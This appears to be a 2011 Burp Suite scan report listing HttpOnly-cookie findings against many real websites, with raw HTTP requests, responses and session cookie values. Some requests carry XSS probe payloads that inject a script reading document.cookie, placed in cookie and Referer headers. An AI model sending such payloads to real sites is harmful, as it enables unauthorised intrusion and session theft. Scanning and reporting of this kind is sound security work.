HTTP/1.0 200 OK Date: Sat, 05 Feb 2011 22:41:46 GMT Server: hi Status: 200 OK X-Transaction: Sat Feb 05 22:41:46 +0000 2011-177-38107 ETag: "3b98753c7a9afa70f5b47cbe55fbd34d" Last-Modified: Sat, 05 Feb 2011 22:41:46 GMT X-Runtime: 0.00745 Content-Type: text/html; charset=utf-8 Content-Length: 49734 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296945706972339; path=/; expires=Sat, 12-Feb-11 22:41:46 GMT; domain=.twitter.com Set-Cookie: guest_id=129694570698256586; path=/; expires=Mon, 07 Mar 2011 22:41:46 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTAxOTg5ZTQwNDI2NWFmODgwNDFiY2ZlNDhhYzRlNmMyIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI6Pf89y0B--7ec0c9d885ab1c36d31391ef5f8dd6b7dc09b362; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
guest_id=129694548879674662; path=/; expires=Mon, 07 Mar 2011 22:38:08 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search/users HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 302 Found Date: Sat, 05 Feb 2011 22:38:08 GMT Server: hi Status: 302 Found Location: http://twitter.com/login?redirect_after_login=%2Fsearch%2Fusers X-Runtime: 0.00169 Content-Type: text/html; charset=utf-8 Content-Length: 129 Cache-Control: no-cache, max-age=300 Set-Cookie: k=173.193.214.243.1296945488792262; path=/; expires=Sat, 12-Feb-11 22:38:08 GMT; domain=.twitter.com Set-Cookie: guest_id=129694548879674662; path=/; expires=Mon, 07 Mar 2011 22:38:08 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCJ2j%252BfctAToOcmV0dXJuX3RvIiRodHRwOi8v%250AdHdpdHRlci5jb20vc2VhcmNoL3VzZXJzOgdpZCIlMGY2Njk4NmFlODY0OWIw%250ANDM4NmQ1NzBiOWQ1MGVlNDUiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6%250AOkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--712ed848cada83454aa0484bff4ba74f3f11800c; domain=.twitter.com; path=/ Expires: Sat, 05 Feb 2011 22:43:08 GMT X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<html><body>You are being <a href="http://twitter.com/login?redirect_after_login=%2Fsearch%2Fusers">redirected</a>.</body></html>
guest_id=12970082986758922; path=/; expires=Tue, 08 Mar 2011 16:04:58 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /share HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 403 Forbidden Date: Sun, 06 Feb 2011 16:04:58 GMT Server: hi Status: 403 Forbidden X-Transaction: Sun Feb 06 16:04:58 +0000 2011-40077-14485 Last-Modified: Sun, 06 Feb 2011 16:04:58 GMT Content-Type: text/html; charset=utf-8 Content-Length: 4792 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1297008298671071; path=/; expires=Sun, 13-Feb-11 16:04:58 GMT; domain=.twitter.com Set-Cookie: guest_id=12970082986758922; path=/; expires=Tue, 08 Mar 2011 16:04:58 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCLQKuPstAToHaWQiJWM5ZWQ0YTM5M2QwOTE2%250AZTMwZjY1YmYzYzViZGVjNzk1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--3851482bffb10ede1aa19e1f488c062976d13f30; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
guest_id=129700829925695163; path=/; expires=Tue, 08 Mar 2011 16:04:59 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /tipd HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sun, 06 Feb 2011 16:04:59 GMT Server: hi Status: 200 OK X-Transaction: Sun Feb 06 16:04:59 +0000 2011-13423-17119 ETag: "e708862f325a33615acc11e3cbe342ac" Last-Modified: Sun, 06 Feb 2011 16:04:59 GMT X-Runtime: 0.00541 Content-Type: text/html; charset=utf-8 Content-Length: 48007 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1297008299249903; path=/; expires=Sun, 13-Feb-11 16:04:59 GMT; domain=.twitter.com Set-Cookie: guest_id=129700829925695163; path=/; expires=Tue, 08 Mar 2011 16:04:59 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCPkMuPstAToHaWQiJWNhNzJmNDk3MWFmM2I0%250AYmNhYWE5OGUyOWNiZDUzNjhjIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--10750576955489608e16b235f232e55307bee9f6; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: unalog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:41:49 GMT Server: Apache Expires: Sat, 05 Feb 2011 22:43:01 GMT Vary: Cookie,Accept-Encoding Last-Modified: Sat, 05 Feb 2011 22:38:01 GMT ETag: "73c782c6bc306be430973b406283c17e" Cache-Control: max-age=300 Set-Cookie: csrftoken=ac1e05ab7cd83b14b6dda0b829643047; Max-Age=31449600; Path=/ Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40754
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /developers/* HTTP/1.1 Host: us.blackberry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dfa_cookie=rimglobal%2Crimbbus; fsr.s={"v":1,"rid":"1296999185012_659282","ru":"http://burp/show/47","r":"burp","st":"","pv":1,"to":3,"c":"http://us.blackberry.com/smartphones/94178\"><script>alert(document.cookie)</script>d0d62204af5/","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1,"f":1296999186933}; s_cc=true; BLLY=35Q54e83kMijy_nk89V0lFAxrY6VDtbVadHWdB3h9L8A2uRr36LQVVw; s_sv_p1=1@17@d/10004/13235&e/3; s_sv_s1=1@16@a//1296999182564; s_vi=[CS]v1|26A75174851D0DA2-40000133800583FB[CE]; s_sq=%5B%5BB%5D%5D; fsr.a=1296999208657; survey=true; s_sv_sid=641990084704;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /macedonia/mk/sonovnik.php HTTP/1.1 Host: www.360macedonia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:52:56 GMT Server: Apache/2.2.11 X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=12e42525981803e02636130728dd646c; path=/ Connection: close Content-Type: text/html Content-Length: 26392
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>........ ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ads/conbanner_bild1.php?cat=bild_bildbanner&w=728&h=90&zanox_tracking_host=http://ad.zanox.com/ppc/&zanox_tracking_param=14786739C435671106%26ULP HTTP/1.1 Host: www.ad4mat.de Proxy-Connection: keep-alive Referer: http://www.shoppinga.de/?bd2d5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee3b5e976e9e=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 17:39:38 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8 X-Powered-By: PHP/5.2.4-2ubuntu5.10 Set-Cookie: PHPSESSID=158dbd606aebc0d8d2504e47a422f607; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 3914 Connection: close Content-Type: text/html Set-Cookie: ad4mat_lb=616182620.20480.0000; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="expires" content="0"><meta http-equiv="cache-control" content="no-ca ...[SNIP]...
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.amazon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:01:25 GMT Server: Server Set-Cookie: skin=noskin; path=/; domain=.amazon.com; expires=Sat, 05-Feb-2011 23:01:25 GMT x-amz-id-1: 0KCJW8RY05PKJVC74BS4 p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC " x-amz-id-2: ZOHvQ9RGUMwBOJTa2KvnRusGxeBk9Xx5NIoqKO+M/pseIEcTTQSnTJ7z6CUtyShJ Vary: Accept-Encoding,User-Agent nnCoection: close Content-Type: text/html; charset=ISO-8859-1 Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: session-id=188-9552736-3777102; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Content-Length: 131368
<html> <head>
<style type="text/css"><!--
BODY { font-family: verdana,arial,helvetica,sans-serif; font-size: x-small; background-color: #FF ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
SESSID=3780594123c995c1366cffc6b7a5fe3a; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.americanexpressfhr.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.baselinemag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=262210463.1296998524.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/45; ebNewBandWidth_.www.baselinemag.com=2657%3A1296998583815; successpage=/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/; s_sq=%5B%5BB%5D%5D; s_nr=1296998582163-New; __utma=262210463.1274416164.1296998524.1296998524.1296998524.1; __utmc=262210463; __qca=P0-352073445-1296998593146; __utmb=262210463.3.10.1296998524; sessioncookie=a3c496ee62329678ad4d9915421e3c06;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ HTTP/1.1 Host: www.baselinemag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /googlecse.html HTTP/1.1 Host: www.baselinemag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=262210463.1296998524.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/45; ebNewBandWidth_.www.baselinemag.com=2657%3A1296998583815; successpage=/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/; s_sq=%5B%5BB%5D%5D; s_nr=1296998582163-New; __utma=262210463.1274416164.1296998524.1296998524.1296998524.1; __utmc=262210463; __qca=P0-352073445-1296998593146; __utmb=262210463.3.10.1296998524; sessioncookie=a3c496ee62329678ad4d9915421e3c06;
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.beckerortho.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Date: Sat, 05 Feb 2011 21:49:37 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: ASPSESSIONIDCQSSDRQQ=LPAPMINCHLCMAFPPCLPLJAFD; path=/ Vary: Accept-Encoding Content-Length: 35585
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.bibsonomy.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:01:30 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Via: 1.1 www.bibsonomy.org, 1.1 www.bibsonomy.org X-Pingback: http://scraper.bibsonomy.org/xmlrpc Set-Cookie: JSESSIONID=69F28CAB61CBF1AC490EAB83BB7E82F5; Path=/ Connection: close Content-Length: 61584
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; cha ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /profile/ HTTP/1.1 Host: www.blackberry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.bookmarks.fr Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.breitband-anbieter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:06:46 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny3 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny3 Set-Cookie: PHPSESSID=be4199973dec3f08f708b276dc31a269; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 13521
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de"> <head>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /news/iphone-5-ipad-2-und-die-lte-tarife-der-deutschen-telekom-659000/ HTTP/1.1 Host: www.breitband-anbieter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:06:47 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny3 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny3 Set-Cookie: PHPSESSID=8fd9477c929c1497df94dbe8861525f5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 13229
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de"> <head>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /web/about/ac123/ac147/archived_issues/ipj_9-1/ip_addresses.html HTTP/1.1 Host: www.cisco.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.coe.gatech.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:53:46 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.13 ETag: "cd5e8abd80fd03f2c8d32b33e06270c9" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Set-Cookie: SESSe21231bc09705de79a97f2d6b2e890fb=645k56n5kokbe2trg1b1r6h6e7; expires=Tue, 01-Mar-2011 01:27:06 GMT; path=/; domain=.coe.gatech.edu Last-Modified: Fri, 04 Feb 2011 19:45:42 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29065
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.diigo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 23:01:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close Set-Cookie: CHKIO=; domain=.diigo.com; path=/; expires=Tue, 01 Feb 2011 19:01:42 GMT Set-Cookie: diigoandlogincookie=; domain=.diigo.com; path=/; expires=Tue, 01 Feb 2011 19:01:42 GMT Set-Cookie: _smasher_session=0884043c57a485ce4cbb73416ccb308f; domain=diigo.com; path=/ ETag: "152b87fdda438c461169e0c57ed9939c" P3P: CP="NOI DEVa TAIa OUR BUS UNI" X-Runtime: 0.00139 Content-Length: 9244 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1 Host: www.dooce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:01:49 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11 X-Powered-By: PHP/5.2.11 Set-Cookie: SESS30952fbaf4ac11922b9cafbdf8d115e4=71f18f11fd684daf83cd39428a8d9146; expires=Tue, 01-Mar-2011 19:35:09 GMT; path=/; domain=.dooce.com Last-Modified: Sun, 06 Feb 2011 16:01:49 GMT ETag: "0493be742911f37fbd142739098641b2" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 10157
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"xmlns=xmlns:og="http://opengraphprot ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.download32.com Proxy-Connection: keep-alive Referer: http://www.download32.com/new.html?e898c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebfecbfd1b5d=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1697810850-1296942494788
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nslookup-software.html HTTP/1.1 Host: www.download32.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Nslookup Software Do ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.ebooklibs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:03:03 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=960c78bbb1339e72b86aff1fa9dcfed2; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28212
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="rob ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /c/a/Web-Services-Web-20-and-SOA/eWeek-Newsbreak-Jan-20-2010/ HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /c/a/Web-Services-Web-20-and-SOA/eWeek-Newsbreak-July-24-2009/ HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /c/a/Windows/5-Reasons-Companies-Arent-Skipping-Vista/ HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /c/a/Windows/Ensuring-Smooth-Upgrade-Path-with-Windows-Vista/ HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /c/a/Windows/How-to-Accurately-Plan-for-Windows-Server-2008-Hardware/ HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /c/s/Videos/ HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
